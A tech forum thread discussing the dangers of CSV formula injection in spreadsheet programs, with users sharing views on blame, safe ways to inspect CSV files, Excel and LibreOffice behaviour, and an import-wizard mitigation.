.CSV files are more dangerous than you may realize

Topic

New Reply

From The Absurdly Underestimated Dangers of CSV Injection:

‘So who’s fault is all of this anyways?

Well it’s not the CSV format’s. The format itself couldn’t be more clear that automatically executing anything that “looks like a formula” is not an intended usage. The bug therefore lies in popular Spreadsheet programs for doing the exact wrong thing. Of course Google Sheets must maintain feature parity with Excel, and Excel must support millions of complex spreadsheets already in existance. Also – I’m not going to research this but – even odds that Excel behavior came from something ancient like Lotus 1-2-3. Getting all spreadsheet programs to change this behavior at this point is a pretty big mountain to conquer. I suppose that it’s everyone else that must change.’

6 users thanked author for this post.

JohnS1606, Noel Carboni, HiFlyer, EstherD, Elly, Woody posting as an MVP

Reply | Quote

Replies

Can malicious CSV files be detected by scanning them with a malware scanner ? If not, how do we ensure CSV files are safe to open ?

Reminds me of the May 2017 reports about how malware can be hidden within subtitle files.

1 user thanked author for this post.

HiFlyer

Reply | Quote

You could try to upload a .csv to VirusTotal, although I’m not sure offhand if any of the scanners there check for this type of issue. You could open a .csv with a text editor such as notepad (built into Windows) or notepad++ to see if there’s anything that looks like a formula in the file.

1 user thanked author for this post.

JohnS1606

Reply | Quote

Mr Brian said:
You could open a .csv with a text editor such as notepad (built into Windows) or notepad++ to see if there’s anything that looks like a formula in the file.

I see … thanks for the advice ! I assume viewing CSV files in the preview pane of Windows Explorer (or any file manager) should be safe as well ?

How about opening CSV files (including those containing formulae) in a rich-text editor like WordPad, or in a dedicated CSV editor/viewer ?

Reply | Quote

I think all of those should be ok, since they hopefully don’t evaluate formulas.

Reply | Quote

I tried to open the first .csv mentioned at the link in the first post. Excel 2016 warns the user.

1 user thanked author for this post.

JohnS1606

Reply | Quote

Tried both of the exploits (with the second one pointed to a pastebin I created, as the author suggested), and neither one worked in LibreOffice 5.3.6.1 (Win 8.1) with default settings.  Score one for the free guys.

While the .csv spec is supposed to disallow parsing any content as anything other than data, I still see a difference between having formulae that calculate things from other cells and those that reach out and execute shell commands or issue HTTP requests.  The latter should definitely not work by default (as in “not work at all,” not “ask the user what to do.”)

As the author of the original piece notes, the problem (if the spreadsheet indeed parses formulae from CSV) is that warning messages have no effect on regular, non-techie users.  “Warning!  An unknown, possibly dangerous program is trying to access the internet.  Select Allow to permit only if you trust this program, or Block if you do not recognize it,” to a standard non-techie user, translates to “Something mysterious happened, and now you have to click Allow to make things start working again.”  Firewall, HIPS, or antimalware programs that default to prompting are in effect “allow all,” as are User Access Control prompts.

Attempts to train regular users about these things have typically met with disappointing results.  Anecdotes about users being given training on how to respond to prompts, phishing attempts, and other things that require thinking before acting abound… I remember one supposedly true story where the IT guys sent around a sample phishing email with a title like “Remember, this is what phishing emails will look like.  NEVER RESPOND TO THEM,” containing a simulated phishing attempt asking the user for their password and username, resulting in multiple users replying to the message that says in its title not to respond, cheerfully giving their username and password, less than ten minutes after completing training in what not to do when phished.

It is… not encouraging.  Many computer users don’t understand anything about what they’re doing, and they don’t want to understand.  It’s almost a point of pride in refusing to move beyond their lack of knowledge.  They fight to remain unsavvy and naive.  Any solution that relies on the user using his head, unfortunately, cannot be trusted.

Things like this should default to not allowing the exploit, even at the risk of frustrating some people who think that violating the very specification of .csv is a good idea if it makes things (that are risky) “just work.”  Some things should not “just work,” but as long as the manufacturer that makes nearly all of the spreadsheets gives it the green light, people will continue to consider it normal and act with the expectation that it will work.  If Excel blocked it by default, it would not take long before the abuse of .csv came to a grinding halt.

Dell XPS 13/9310, i5-1135G7/16GB, KDE Neon 6.2
XPG Xenia 15, i7-9750H/32GB & GTX1660ti, Kubuntu 24.04
Acer Swift Go 14, i5-1335U/16GB, Kubuntu 24.04 (and Win 11)

5 users thanked author for this post.

Steve, Noel Carboni, Cascadian, Elly, HiFlyer

Reply | Quote

Dunning/Kruger, unknown-unknowns, and other effects

I often wonder how high or how far down on the scale I actually am. And I will never know-know. That’s kind of the point. And any ‘neutral objective’ observer is limited by their own versions of the above, because they are unable to truly see as I see. Einstein’s relativity extends beyond physics too.

I will acknowledge pressing ‘y’ once too often from time to time. But that ‘red X to accept’ never got me. I figure I’m 55percentile or better.

Reply | Quote

We’ll probably never know who thought such behavior was okay, but they probably thought speeding things up was a great idea. And that must be some awfully written parser code to naturally execute external programs! Microsoft, Google and any other creators of spreadsheet programs have the responsibility fix their code to not execute anything when importing CSV files.

Reply | Quote

Another discussion about this: https://www.reddit.com/r/netsec/comments/75g4k7/the_absurdly_underestimated_dangers_of_csv/.

1 user thanked author for this post.

Elly

Reply | Quote

Another: https://www.reddit.com/r/programming/comments/75cupe/the_absurdly_underestimated_dangers_of_csv/.

1 user thanked author for this post.

Elly

Reply | Quote

.CSV files with some formulas don’t cause Excel 2016 to warn the user upon opening. Example: “=2+2”, which Excel evaluates to 4.

Reply | Quote

From https://www.reddit.com/r/programming/comments/75cupe/the_absurdly_underestimated_dangers_of_csv/do5pd9w/: ‘As an FYI, a really easy way to mitigate this in Excel is to import data into a blank sheet rather than directly opening the csv and marking the datatype for each column as text during the import wizard. The issue is that by default Excel (and other spreedsheet programs) formats each column as “general” which will evaluate anything that looks like a formula as a formula.’

Text Import Wizard

2 users thanked author for this post.

Elly, woody

Reply | Quote